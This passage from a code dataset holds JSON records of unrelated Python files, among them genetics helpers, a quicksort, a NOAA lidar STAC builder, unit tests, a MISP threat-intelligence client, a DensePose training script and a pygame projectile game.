required\n if delete == True:\n path_folder = os.path.join(base_path, iid_file, \"chr\"+str(ch), prefix_out, \"\") \n\n for root, _, files in os.walk(path_folder):\n for file in files:\n os.remove(os.path.join(root, file))\n os.rmdir(path_folder) # Remove the Chromosome Folders\n os.rmdir(os.path.join(base_path, iid_file, \"\")) # Remove the Individual Folder\n\n######################################################\n### For running bcftools & plink\n\ndef create_folders(input_base_folder, outfolder=\"plink_out/\"):\n \"\"\"Create Folders for ROH analysis with Plink/BCFTOOLs.\n Operates within HAPSBURG Mosaic Data Structure. Return\n h5 path, vcf path, and folder for intermediary output\"\"\"\n input_h5 = os.path.join(input_base_folder, \"data.h5\")\n input_vcf = os.path.join(input_base_folder, \"data.vcf\")\n \n if not os.path.exists(input_h5):\n raise RuntimeError(f\"Create .vcf file: {input_h5}\")\n \n plink_folder = os.path.join(input_base_folder, outfolder)\n if not os.path.exists(plink_folder):\n print(f\"Creating Folder for: {plink_folder}\")\n os.makedirs(plink_folder)\n \n return input_h5, input_vcf, plink_folder\n\ndef split_up_inferred_roh(df_t, iid, save_path):\n \"\"\"Extract only ROH from Individual iid and saves it to save_path\"\"\"\n df_iid = df_t[df_t[\"iid\"]==iid]\n df_iid.to_csv(save_path, index=False)\n \ndef postprocess_iid(df_plink, input_base_folder, iids, ch=3, prefix_out=\"\"):\n \"\"\"Split up results into roh.csv and roh_gt.csv for each IID.\n df_plink: Data Frame with Plink results, formated correctly\"\"\"\n\n for iid in iids:\n output_base_folder = os.path.join(input_base_folder, \"output/\")\n path_out = prepare_path(output_base_folder, iid, ch, prefix_out=prefix_out, logfile=False)\n\n path_inferred = os.path.join(path_out, \"roh.csv\")\n split_up_inferred_roh(df_plink, iid, save_path=path_inferred) # Split up Inferred ROH\n split_up_roh_df(input_base_folder, path_out, iid) # Split up Ground Truth ROH","repo_name":"hringbauer/hapROH","sub_path":"package/hapsburg/PackagesSupport/parallel_runs/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"33547745025","text":"def quickSortPivotFirstElement(array):\n quickSortRecPivotFirstElement(array, 0, len(array)-1)\n return array\n\n# quickSort recursive call\ndef quickSortRecPivotFirstElement(array, startIdx, endIdx):\n # base case: contain a singe element\n if startIdx >= endIdx:\n return\n \n # 1. pick the first element as a pivot\n pivotIdx = startIdx\n leftIdx = startIdx + 1\n rightIdx = endIdx\n # 2. rearrange the array\n # 2.1 move elements smaller than the pivot to the left. Otherwise, move to the right\n while leftIdx <= rightIdx:\n if array[leftIdx] > array[pivotIdx] and array[pivotIdx] > array[rightIdx]:\n swap(leftIdx, rightIdx, array)\n # equal sign for duplicate numbers\n if array[leftIdx] <= array[pivotIdx]:\n leftIdx += 1\n if array[pivotIdx] <= array[rightIdx]:\n rightIdx -= 1\n \n # 2.2 place the pivot at the current position in the sorted array\n swap(pivotIdx, rightIdx, array) \n\n # current array status: left subarray | pivot(rightIdx) | right subarray\n # 3. partition\n quickSortRecPivotFirstElement(array, startIdx, rightIdx - 1)\n quickSortRecPivotFirstElement(array, rightIdx + 1, endIdx)\n\ndef swap(i, j, array):\n array[i], array[j] = array[j], array[i]\n\n\nif __name__ == \"__main__\":\n array = [8, 5, 2, 4, 11, 9, 22]\n print(\"pick the 1st element as a pivot\", quickSortPivotFirstElement(array))\n\n\"\"\"\noutput: ('pick the 1st element as a pivot', [2, 4, 5, 8, 9, 11, 22])\n\"\"\"","repo_name":"ClaireLee22/QuickSort-algorithm","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36392707800","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport pyrebase\n\ndef initDatabase(db):\n current = []\n voltage = []\n\n try:\n voltage_db = db.child(\"voltage\").get()\n current_db = db.child(\"current\").get()\n except Exception as e:\n print(e)\n return \n \n for ddp in voltage_db.each():\n voltage.append(ddp.val())\n\n for ddp in current_db.each():\n parsedCurrent = (-ddp.val() + 1.7)/10**5\n current.append(parsedCurrent)\n \n data = {'Voltage': voltage, 'Current': current}\n return data\n\ndef exportCSV(data):\n csvFile = pd.DataFrame(data, columns=['Voltage', 'Current'])\n csvFile.to_csv('export_dataframe.csv', index = False, header=True)\n\n print('Os dados foram exportados com sucesso!')\n return\n\ndef getVoltametricGraph(data):\n plt.title('Voltametria cíclica')\n plt.xlabel('Tensão (Volt)')\n plt.ylabel('Corrente (Amper)')\n plt.scatter(data['Voltage'], data['Current'])\n plt.savefig('voltametricData.png', format='png')\n plt.show()\n\n print('Você poderá ver o gráfico no mesmo diretório que rodou a aplicação')\n return\n\ndef startNewMeasurement(db):\n db.child('measurement').update({'measurement': True })\n return\n\ndef endMeasurement(db):\n db.child('measurement').update({'measurement': False })\n return\n\nif __name__ == '__main__':\n print('Sistema de análise e Medição de sal na água')\n #inicializando Firebase\n firebaseConfig={\n \"apiKey\": \"your api key\",\n \"authDomain\": \"your authDomain\",\n \"databaseURL\": \"your database\",\n \"projectId\": \"your project id\",\n \"storageBucket\": \"storageBucket\",\n \"messagingSenderId\": \"messagingSenderId\",\n \"appId\": \"appId\",\n \"measurementId\": \"measurementId\"\n }\n\n firebase = pyrebase.initialize_app(firebaseConfig)\n db = firebase.database()\n\n database = initDatabase(db)\n\n while True:\n option = input('''\n Digite as informações desejadas: \n [1] - exportar arquivo csv\n [2] - ver o gráfico da voltametria cíclica\n [3] - inicializar uma nova medição\n [4] - encerrar a medição\n [5] - sair da aplicação\n ''')\n \n if option == '1':\n exportCSV(database)\n elif option == '2':\n getVoltametricGraph(database)\n elif option == '3':\n startNewMeasurement(db)\n elif option == '4':\n endMeasurement(db)\n elif option == '5':\n print('Voce saiu da aplicação')\n break","repo_name":"gustavoeraldo/water-analysis-system","sub_path":"interface/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17794034499","text":"import json\nimport pyproj\nimport datetime\nimport xml.etree.ElementTree as ET\n\nfrom os import path, makedirs\nfrom urllib import request\nfrom typing import List\n\nfrom pystac import ItemCollection, Item, Link, Asset, Catalog, CatalogType, RelType\nfrom pystac.extensions.pointcloud import PointcloudExtension, Schema\nfrom pystac.extensions.projection import ProjectionExtension\n\nfrom shapely.ops import transform\nfrom shapely.geometry import shape, mapping\n\ndef get_json_info(href: str):\n try:\n contents = request.urlopen(href).read()\n except:\n return {}\n json_info = json.loads(contents)\n return json_info\n\ndef parse_metadata(href: str):\n metadata_info = {}\n metadata_path = path.join(href, 'inport-xml')\n try:\n contents = request.urlopen(metadata_path).read()\n except:\n return metadata_info\n parsed = ET.fromstring(contents)\n\n # Get data description\n description = parsed.find('item-identification').find('abstract').text\n if description:\n metadata_info['description'] = description\n\n # Find dates. Start with start and end dates if range, start date if discrete\n # If those don't exist, get publication date. If that doesn't exist, return nothing\n # and we'll attempt dates from the feature data\n extents = parsed.find('extents').find('extent')\n try:\n dates = extents.find('time-frames').find('time-frame')\n date_type = dates.find('time-frame-type').text\n if date_type == 'Range':\n metadata_info['start_date'] = dates.find('start-date-time').text\n metadata_info['end_date'] = dates.find('end-date-time').text\n elif date_type == 'Discrete':\n metadata_info['date'] = dates.find('start-date-time').text\n except AttributeError:\n if parsed.find('item-identification').find('publication-date'):\n metadata_info['date'] = parsed.find('item-identification').find('publication-date').text\n\n # Get support links. If there are no contact links, return nothing.\n support_roles = parsed.find('support-roles')\n if support_roles:\n metadata_info['support_roles'] = []\n for sr in support_roles:\n try:\n metadata_info['support_roles'].append(\n {\n 'href': sr.find('contact-url').text,\n 'title': sr.find('support-role-type').text,\n 'name': sr.find('contact-name').text\n }\n )\n except AttributeError:\n pass\n\n return metadata_info\n\ndef make_datetime(date_string: str) -> datetime.datetime:\n if len(date_string)== 4:\n return datetime.datetime.strptime(date_string, '%Y')\n elif len(date_string) == 7:\n return datetime.datetime.strptime(date_string, '%Y-%m')\n else:\n return datetime.datetime.strptime(date_string, '%Y-%m-%d')\n\ndef make_datetime_str(date_string) -> str:\n return make_datetime(date_string).isoformat() + \"Z\"\n\n\ndef process_one(\n feature: dict,\n src_crs: pyproj.CRS,\n dst_crs: pyproj.CRS,\n trn: pyproj.Transformer) -> Item:\n properties = feature['properties']\n name = properties['Name']\n\n src_geometry = feature['geometry']\n s = shape(src_geometry)\n src_bbox = list(s.bounds)\n\n item_bbox = trn.transform_bounds(*src_bbox)\n item_geometry = mapping(transform(trn.transform, s))\n\n metadata_link = properties['Metalink']\n metadata = parse_metadata(metadata_link)\n item_properties = { 'description': metadata['description'] }\n\n # If start and end date are available, use them. If not go to discrete date.\n # If that's not there, use the date provided in the\n if 'start_date' in metadata and 'end_date' in metadata:\n item_properties['end_datetime'] = make_datetime_str(metadata['end_date'])\n item_properties['start_datetime'] = make_datetime_str(metadata['start_date'])\n item_date = None\n elif 'date' in metadata:\n item_date = make_datetime(metadata['date'])\n else:\n item_year = properties['Year']\n if item_year != 0:\n item_date = make_datetime(str(item_year))\n if item_year == 0:\n item_date = datetime.datetime.now()\n\n extra_links = properties['ExternalProviderLink']['links']\n ept_data = {}\n\n # Look for data links\n for link in extra_links:\n # skip invalid links\n if 'label' not in link and 'altlabel' not in link:\n continue\n if 'link' not in link:\n continue\n\n # Grab EPT data if it's available\n if link['label'] == 'EPT NOAA' or link['altlabel'] == 'Entwine Point Tile JSON file':\n ept_link = link['link']\n ept_data = get_json_info(ept_link)\n\n\n if not ept_data:\n return { }\n\n # construct initial item\n item = Item(\n id=name,\n geometry=item_geometry,\n bbox=item_bbox,\n datetime=item_date,\n properties=item_properties\n )\n\n # Create pointcloud extension and required keys\n item_point_count = ept_data['points']\n ept_schema = ept_data['schema']\n item_schema = []\n for d in ept_schema:\n # change 'float' to 'floating' to fit pointcloud stac schema\n if d['type'] == 'float':\n d['type'] = 'floating'\n item_schema.append(Schema(d))\n\n PointcloudExtension.ext(item, add_if_missing=True).apply(\n encoding='ept',\n count=item_point_count,\n type='lidar',\n schemas=item_schema\n )\n\n # Create projection extension and required keys\n epsg = src_crs.to_epsg()\n ProjectionExtension.ext(item, add_if_missing=True).apply(\n epsg = epsg,\n geometry = src_geometry,\n projjson = src_crs.to_json_dict(),\n wkt2 = src_crs.to_wkt(),\n bbox = src_bbox,\n )\n asset = Asset(\n href=ept_link,\n title='EPT',\n media_type='application/json',\n roles=['data']\n )\n if 'support_roles' in metadata:\n for link in metadata['support_roles']:\n l = Link(rel=link['title'], target=link['href'], title=link['name'])\n item.add_link(l)\n item.add_asset('ept', asset)\n return item\n\n\ndef noaa_info(output_dir: str) -> ItemCollection:\n noaa_url = f'https://noaa-nos-coastal-lidar-pds.s3.us-east-1.amazonaws.com/laz/dav.json'\n\n resources = get_json_info(noaa_url)\n src_crs = pyproj.CRS.from_user_input(resources['crs']['properties']['name'])\n dst_crs = pyproj.CRS.from_epsg(4326)\n trn = pyproj.Transformer.from_crs(src_crs, dst_crs, always_xy=True)\n\n item_list: List[Item] = [ ]\n catalog = Catalog(id = 'NOAA STAC', description='NOAA STAC Catalog of Lidar Items', catalog_type=CatalogType.SELF_CONTAINED)\n catalog.set_self_href(path.join(output_dir, 'catalog.json'))\n\n features = resources['features']\n full_count = len(features)\n\n for index, feature in enumerate(features):\n data_type = feature['properties']['DataType']\n name = feature['properties']['Name'].replace(\"/\", \"_\")\n # Only currently handling lidar data type\n item = { }\n if data_type == 'Lidar':\n item = process_one(feature, src_crs, dst_crs, trn)\n else:\n continue\n\n if item:\n try:\n item.validate()\n item_list.append(item)\n\n output_path = path.join(output_dir, f'{name}.json')\n item_href = f'{name}.json'\n item.set_self_href(item_href)\n item_link = Link(rel=RelType.ITEM, target=item_href)\n catalog.add_link(item_link)\n\n # Write out Item\n with open(output_path, 'w') as output_file:\n output_file.write(json.dumps(item.to_dict(), indent=2))\n except Exception as e:\n error_path = path.join(output_dir, 'errors')\n if not path.exists(error_path):\n makedirs(error_path)\n error_file = path.join(error_path, name)\n with open(error_file, 'w') as error_out:\n error_out.write(str(e))\n print(f'{index}/{full_count} done.')\n\n # Write out catalog\n catalog_path = path.join(output_dir, 'catalog.json')\n with open(catalog_path, 'w') as cat_file:\n cat_file.write(json.dumps(catalog.to_dict(), indent=2))\n\n # Write out item collection\n item_collection_path = path.join(output_dir, 'noaa_item_collection.json')\n ic = ItemCollection(item_list)\n with open(item_collection_path, 'w') as ic_file:\n ic_file.write(json.dumps(ic.to_dict(), indent=2))\n\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--stac_directory\", default=\"noaa_stac\", type=str, help=\"Directory to put stac catalog\")\n\n args = parser.parse_args()\n\n print(f\"Writing out to {args.stac_directory}\")\n\n if not path.exists(args.stac_directory):\n makedirs(args.stac_directory)\n\n noaa_info(args.stac_directory)\n\nmain()\n","repo_name":"hobuinc/usgs-lidar","sub_path":"action/usgs_boundary/noaa.py","file_name":"noaa.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"7"} +{"seq_id":"36522578361","text":"from . import BaseTest\n\n\nclass TestTUI(BaseTest):\n\n def test_line_edit(self):\n from kittens.tui.line_edit import LineEdit\n le = LineEdit()\n le.on_text('abcd', False)\n self.ae(le.cursor_pos, 4)\n for i in range(5):\n self.assertTrue(le.left()) if i < 4 else self.assertFalse(le.left())\n self.ae(le.cursor_pos, max(0, 3 - i))\n self.ae(le.pending_bell, True)\n le.clear()\n le.on_text('abcd', False), le.home()\n self.ae(le.cursor_pos, 0)\n for i in range(5):\n self.assertTrue(le.right()) if i < 4 else self.assertFalse(le.right())\n self.ae(le.cursor_pos, min(4, i + 1))\n self.ae(le.pending_bell, True)\n le.clear()\n le.on_text('abcd', False)\n self.ae(le.current_input, 'abcd')\n self.ae(le.cursor_pos, 4)\n self.ae(le.split_at_cursor(), ('abcd', ''))\n le.backspace()\n self.ae(le.current_input, 'abc')\n self.ae(le.cursor_pos, 3)\n self.assertFalse(le.pending_bell)\n le.backspace(num=2)\n self.ae(le.current_input, 'a')\n self.ae(le.cursor_pos, 1)\n self.assertFalse(le.pending_bell)\n le.backspace(num=2)\n self.ae(le.current_input, '')\n self.ae(le.cursor_pos, 0)\n le.backspace()\n self.assertTrue(le.pending_bell)\n\n def test_multiprocessing_spawn(self):\n from kitty.multiprocessing import test_spawn\n test_spawn()\n","repo_name":"kovidgoyal/kitty","sub_path":"kitty_tests/tui.py","file_name":"tui.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":20382,"dataset":"github-code","pt":"7"} +{"seq_id":"71884149344","text":"import pytest\nfrom dune.xt.common.test import load_all_submodule\n\n\ndef test_load_all():\n import dune.xt.common as xtc\n load_all_submodule(xtc)\n\n\ndef test_empty():\n from dune.xt.common._empty import Dog, Pet, Terrier\n\n dog = Dog('Susi')\n pet = Pet('Bello')\n ter = Terrier()\n\n assert ter.getName() == 'Berti'\n assert pet.getName() == 'Bello'\n assert ter.bark() == 'woof!'\n\n\ndef test_logging():\n import dune.xt.common.logging as lg\n lg.create(lg.log_max)\n lg.info('log info test')\n lg.error('log error test')\n lg.debug('log debug test')\n\n\ndef test_timings():\n from dune.xt.common.timings import instance\n timings = instance()\n timings.reset()\n timings.start(\"foo.bar\")\n timings.stop()\n timings.output_simple()\n\n\nif __name__ == '__main__':\n from dune.xt.common.test import runmodule\n runmodule(__file__)\n","repo_name":"dune-community/dune-xt-common","sub_path":"python/test/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"30782247481","text":"import json\nimport logging\n\nfrom pymisp.api import PyMISP, MISPAttribute, MISPEvent, MISPTag\nfrom typing import List, Union\nfrom urllib.parse import urljoin\n\nimport saq\n\nfrom saq.constants import *\nfrom saq.indicators import Indicator\nfrom saq.tip.base import TIP\n\n\nclass MISP(TIP):\n def __init__(self):\n super().__init__()\n\n self.ioc_type_mappings = {\n I_DOMAIN: 'domain',\n I_EMAIL_ATTACHMENT_NAME: 'filename',\n I_EMAIL_CC_ADDRESS: 'email-dst',\n I_EMAIL_FROM_ADDRESS: 'email-src',\n I_EMAIL_FROM_ADDRESS_DOMAIN: 'domain',\n I_EMAIL_MESSAGE_ID: 'email-message-id',\n I_EMAIL_SUBJECT: 'email-subject',\n I_EMAIL_TO_ADDRESS: 'email-dst',\n I_EMAIL_X_AUTH_ID: 'email-src',\n I_EMAIL_X_MAILER: 'email-x-mailer',\n I_EMAIL_X_ORIGINAL_SENDER: 'email-src',\n I_EMAIL_X_ORIGINATING_IP: 'ip-src',\n I_EMAIL_REPLY_TO: 'email-src',\n I_EMAIL_RETURN_PATH: 'email-src',\n I_EMAIL_X_SENDER: 'email-src',\n I_EMAIL_X_SENDER_ID: 'email-src',\n I_EMAIL_X_SENDER_IP: 'ip-src',\n I_FILE_NAME: 'filename',\n I_IP_DEST: 'ip-dst',\n I_IP_SOURCE: 'ip-src',\n I_MD5: 'md5',\n I_SHA1: 'sha1',\n I_SHA256: 'sha256',\n I_URI_PATH: 'uri',\n I_URL: 'url'\n }\n\n self.name = 'MISP'\n self.misp_url = saq.CONFIG['misp']['url']\n self.api_key = saq.CONFIG['misp']['api_key']\n self._pymisp_client = None\n\n @property\n def pymisp_client(self):\n if self._pymisp_client is None:\n self._pymisp_client = PyMISP(self.misp_url, self.api_key)\n\n return self._pymisp_client\n\n def _get_event_cache_key(self, event: dict) -> str:\n return f'event:{event[\"uuid\"]}'\n\n def _get_indicator_cache_key(self, indicator: dict) -> str:\n return f'indicator:{indicator[\"type\"]}:{indicator[\"value\"]}'\n\n def ace_event_exists_in_tip(self, ace_event_uuid: str) -> bool:\n result = self.pymisp_client.get_event(ace_event_uuid)\n return 'Event' in result\n\n def add_indicators_to_event_in_tip(self, ace_event_uuid: str, indicators: Union[List[Indicator], List[dict], dict]) -> bool:\n def _convert_indicator_objects_to_dicts(indicator_objects: List[Indicator]) -> List[dict]:\n return [i.json if isinstance(i, Indicator) else i for i in indicator_objects]\n\n if isinstance(indicators, dict):\n indicators = [indicators]\n\n indicators = _convert_indicator_objects_to_dicts(indicators)\n\n misp_event = self.pymisp_client.get_event(ace_event_uuid, pythonify=True)\n\n for indicator in indicators:\n misp_attribute = MISPAttribute()\n misp_attribute.type = indicator['type']\n misp_attribute.value = indicator['value']\n\n if 'status' in indicator and indicator['status'].lower() == 'informational':\n misp_attribute.to_ids = False\n\n if 'tags' in indicator:\n for tag in indicator['tags']:\n misp_tag = MISPTag()\n misp_tag.name = tag\n misp_attribute.tags.append(misp_tag)\n\n misp_event.attributes.append(misp_attribute)\n\n result = self.pymisp_client.update_event(misp_event)\n\n return 'Event' in result\n\n def create_event_in_tip(self, ace_event_name: str, ace_event_uuid: str, ace_event_url: str) -> bool:\n if self.ace_event_exists_in_tip(ace_event_uuid):\n return True\n\n event = MISPEvent()\n event.info = ace_event_name\n event.uuid = ace_event_uuid\n\n link_attribute = MISPAttribute()\n link_attribute.category = 'Internal reference'\n link_attribute.type = 'link'\n link_attribute.value = ace_event_url\n link_attribute.comment = 'ACE Event'\n link_attribute.disable_correlation = True\n event.attributes.append(link_attribute)\n\n for event_tag in saq.CONFIG['tip']['event_tags'].split(','):\n tag = MISPTag()\n tag.name = event_tag\n event.tags.append(tag)\n\n result = self.pymisp_client.add_event(event)\n if 'Event' in result:\n logging.info(f'Created MISP event {ace_event_uuid}')\n return True\n\n return False\n\n def event_url(self, event_id: str) -> str:\n return urljoin(self.misp_url, f'/events/view/{event_id}')\n\n def get_all_events_from_tip(self) -> List[dict]:\n result = self.pymisp_client.events()\n return result if 'errors' not in result else []\n\n def get_all_indicators_from_tip(self, enabled: bool = True, modified_after_timestamp: int = 0) -> List[dict]:\n result = self.pymisp_client.search(controller='attributes', to_ids=enabled, timestamp=modified_after_timestamp)\n return result['Attribute'] if 'Attribute' in result else []\n\n def get_indicator_summaries_from_cache(self, indicators: List[dict]) -> List[dict]:\n summaries = []\n for cache_hit in self.find_indicators(indicators):\n summary = {\n 'type': cache_hit[0]['type'],\n 'value': cache_hit[0]['value'],\n 'event_tags': set(),\n 'indicator_tags': set(),\n 'tip_event_urls': set()\n }\n\n for indicator in cache_hit:\n cached_event = self.find_event(indicator['Event']['uuid'])\n if cached_event:\n summary['tip_event_urls'].add(self.event_url(cached_event['id']))\n\n if 'EventTag' in cached_event:\n summary['event_tags'] |= {tag['Tag']['name'] for tag in cached_event['EventTag']}\n\n if 'Tag' in indicator:\n summary['indicator_tags'] |= {tag['name'] for tag in indicator['Tag']}\n\n summary['event_tags'] = sorted(list(summary['event_tags']))\n summary['indicator_tags'] = sorted(list(summary['indicator_tags']))\n summary['tip_event_urls'] = sorted(list(summary['tip_event_urls']))\n\n summaries.append(summary)\n\n return summaries\n","repo_name":"ace-ecosystem/ACE","sub_path":"saq/tip/misp.py","file_name":"misp.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"7"} +{"seq_id":"17242153952","text":"#from qgis.utils import qgsfunction\r\n\r\nimport qgis\r\n\r\nfrom qgis.core import *\r\nfrom qgis.gui import *\r\nfrom qgis.utils import *\r\nimport math\r\nfrom geomGen import genGeom\r\n\r\nimport sys\r\n\r\n\r\n\"\"\" ****************************** \"\"\"\r\n\r\n\r\n@qgsfunction(args='auto', group='tblLabel', usesgeometry=True, register=True)\r\ndef tblDisplay(feature, parent):\r\n try:\r\n res = genGeom.displayTable(feature)\r\n except:\r\n QgsMessageLog.logMessage('generate_display_geometry error in expression function: {}'.format(sys.exc_info()[0]), tag=\"TOMs panel\")\r\n\r\n return res\r\n\r\nfunctions = [\r\n tblDisplay\r\n]\r\n\r\ndef registerFunctions():\r\n\r\n tbl_list = QgsExpression.Functions()\r\n\r\n for func in functions:\r\n QgsMessageLog.logMessage(\"Considering function {}\".format(func.name()), tag=\"TOMs panel\")\r\n try:\r\n if func in tbl_list:\r\n QgsExpression.unregisterFunction(func.name())\r\n #del toms_list[func.name()]\r\n except AttributeError:\r\n #qgis.toms_functions = dict()\r\n pass\r\n\r\n if QgsExpression.registerFunction(func):\r\n QgsMessageLog.logMessage(\"Registered expression function {}\".format(func.name()), tag=\"TOMs panel\")\r\n #qgis.toms_functions[func.name()] = func\r\n\r\n \"\"\"for title in qgis.toms_functions:\r\n QgsMessageLog.logMessage(\"toms_functions function {}\".format(title), tag=\"TOMs panel\")\r\n\r\n for title2 in toms_list:\r\n QgsMessageLog.logMessage(\"toms_list function {}\".format(title2.name()), tag=\"TOMs panel\")\"\"\"\r\n\r\ndef unregisterFunctions():\r\n # Unload all the functions that we created.\r\n for func in functions:\r\n QgsExpression.unregisterFunction(func.name())\r\n QgsMessageLog.logMessage(\"Unregistered expression function {}\".format(func.name()), tag=\"TOMs panel\")\r\n #del qgis.toms_functions[func.name()]\r\n\r\n QgsExpression.cleanRegisteredFunctions()\r\n","repo_name":"tlh22/FlowReporting","sub_path":"tblExpressions.py","file_name":"tblExpressions.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40244050742","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy as sp\nfrom scipy import signal\nfrom ptsa.ptsa import emd\n\ndef main():\n x = np.linspace(0, np.pi * 30, 1000)\n y1 = np.sin(x)\n y2 = np.sin(x / 2)\n y3 = np.sin(x / 4)\n y = y1 + y2 + y3\n f, ax = plt.subplots(4, 1, sharex=True, sharey=True)\n ax[0].plot(x, y, color=\"k\")\n ax[0].set_title(\"Original Signal\", fontsize=22)\n \n ue = emd._get_upper_spline(y)\n le = -emd._get_upper_spline(-y)\n ax[1].plot(x, y, color=\"k\")\n ax[1].plot(x, ue, color=\"r\", linestyle=\"-\")\n ax[1].plot(x, le, color=\"g\", linestyle=\"-\")\n avg = (ue + le) / 2\n ax[1].plot(x, avg, color=\"b\", linestyle=\"-\")\n ax[1].set_title(\"Calculate Mean of Upper and Lower Envolopes\", fontsize=22)\n \n imf1 = y - avg\n ax[2].plot(x, imf1, color=\"k\")\n ax[2].set_title(\"Intrinsic Mode Function (IMF) = Original Signal - Mean\", fontsize=22)\n\n res = y - imf1\n ax[3].plot(x, res, color=\"k\")\n ax[3].set_title(\"Residual = Original Signal - IMF\", fontsize=22)\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PCMan/vf_filter","sub_path":"demo_emd.py","file_name":"demo_emd.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72869752222","text":"from datetime import timedelta\n\nimport detectron2.utils.comm as comm\nfrom detectron2.config import get_cfg\nfrom detectron2.engine import DEFAULT_TIMEOUT, default_argument_parser, default_setup, hooks, launch\nfrom detectron2.evaluation import verify_results\nfrom detectron2.utils.file_io import PathManager\nfrom detectron2.utils.logger import setup_logger\n\nfrom densepose import add_densepose_config\nfrom densepose.engine import Trainer\nfrom densepose.modeling.densepose_checkpoint import DensePoseCheckpointer\n\n\ndef setup(args):\n cfg = get_cfg()\n add_densepose_config(cfg)\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n cfg.freeze()\n default_setup(cfg, args)\n # Setup logger for \"densepose\" module\n setup_logger(output=cfg.OUTPUT_DIR, distributed_rank=comm.get_rank(), name=\"densepose\")\n return cfg\n\n\ndef main(args):\n cfg = setup(args)\n # disable strict kwargs checking: allow one to specify path handle\n # hints through kwargs, like timeout in DP evaluation\n PathManager.set_strict_kwargs_checking(False)\n\n if args.eval_only:\n model = Trainer.build_model(cfg)\n DensePoseCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load(\n cfg.MODEL.WEIGHTS, resume=args.resume\n )\n res = Trainer.test(cfg, model)\n if cfg.TEST.AUG.ENABLED:\n res.update(Trainer.test_with_TTA(cfg, model))\n if comm.is_main_process():\n verify_results(cfg, res)\n return res\n\n trainer = Trainer(cfg)\n trainer.resume_or_load(resume=args.resume)\n if cfg.TEST.AUG.ENABLED:\n trainer.register_hooks(\n [hooks.EvalHook(0, lambda: trainer.test_with_TTA(cfg, trainer.model))]\n )\n return trainer.train()\n\n\nif __name__ == \"__main__\":\n args = default_argument_parser().parse_args()\n cfg = setup(args)\n timeout = (\n DEFAULT_TIMEOUT if cfg.DENSEPOSE_EVALUATION.DISTRIBUTED_INFERENCE else timedelta(hours=4)\n )\n print(\"Command Line Args:\", args)\n launch(\n main,\n args.num_gpus,\n num_machines=args.num_machines,\n machine_rank=args.machine_rank,\n dist_url=args.dist_url,\n args=(args,),\n timeout=timeout,\n )\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/dev/cv/image_classification/SlowFast_ID0646_for_PyTorch/detectron2/projects/DensePose/train_net.py","file_name":"train_net.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"30295188016","text":"import sys, pygame\nimport math\n\nscreen_width = 640\nscreen_height = 480\nwin = pygame.display.set_mode((screen_width, screen_height))\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\n\n# target\ntargetY = 150\ntargetX = 100\ntargetX_change = 0\ntargetY_change = 0\n\n# bullet\nvelocity = 10\ntheta = 20\ntime = 0\nbullet_x = 0\nbullet_y = screen_height\nbullet_state = \"ready\"\n\n\ndef update_position(t):\n g = 9.8 / 100\n global bullet_x\n global bullet_y\n global bullet_state\n global velocity\n global theta\n if bullet_state is \"fire\":\n bullet_x = velocity * math.cos(theta) * t\n bullet_y = velocity * math.sin(theta) * t - 0.5 * g * t * t\n bullet_y = screen_height - bullet_y\n #print(str(bullet_x) + \" \" + str(bullet_y))\n if bullet_x > screen_width or bullet_x < 0 or bullet_y > screen_height or bullet_y < -1:\n bullet_state = \"ready\"\n bullet_x = 0\n bullet_y = screen_height\n\n\ndef fire_bullet():\n global bullet_x\n global bullet_y\n global bullet_state\n global time\n if bullet_state is \"ready\":\n time = 0\n bullet_state = \"fire\"\n\n\nwhile 1:\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n sys.exit()\n\n if event.type == pygame.KEYDOWN:\n\n if event.key == pygame.K_UP:\n targetY_change = -.4\n\n if event.key == pygame.K_DOWN:\n targetY_change = .4\n\n if event.key == pygame.K_LEFT:\n targetX_change = -.4\n\n if event.key == pygame.K_RIGHT:\n targetX_change = .4\n\n if event.key == pygame.K_SPACE:\n fire_bullet()\n\n if event.key == pygame.K_w:\n theta += 0.1\n if event.key == pygame.K_s:\n theta -= 0.1\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or pygame.K_RIGHT:\n targetX_change = 0\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_UP or pygame.K_DOWN:\n targetY_change = 0\n\n if targetY <= 0:\n targetY = 0\n if targetY >= 430:\n targetY = 430\n if targetX >= 590:\n targetX = 590\n if targetX <= 320:\n targetX = 320\n\n targetX += targetX_change\n targetY += targetY_change\n\n if bullet_state is \"fire\":\n time = time + 0.05\n update_position(time)\n\n bullet = pygame.Rect(bullet_x, bullet_y, 10, 10)\n print(str(bullet_x) + \" \" + str(bullet_y))\n target = pygame.Rect(targetX, targetY, 50, 50)\n win.fill(black)\n win.fill(white, target)\n 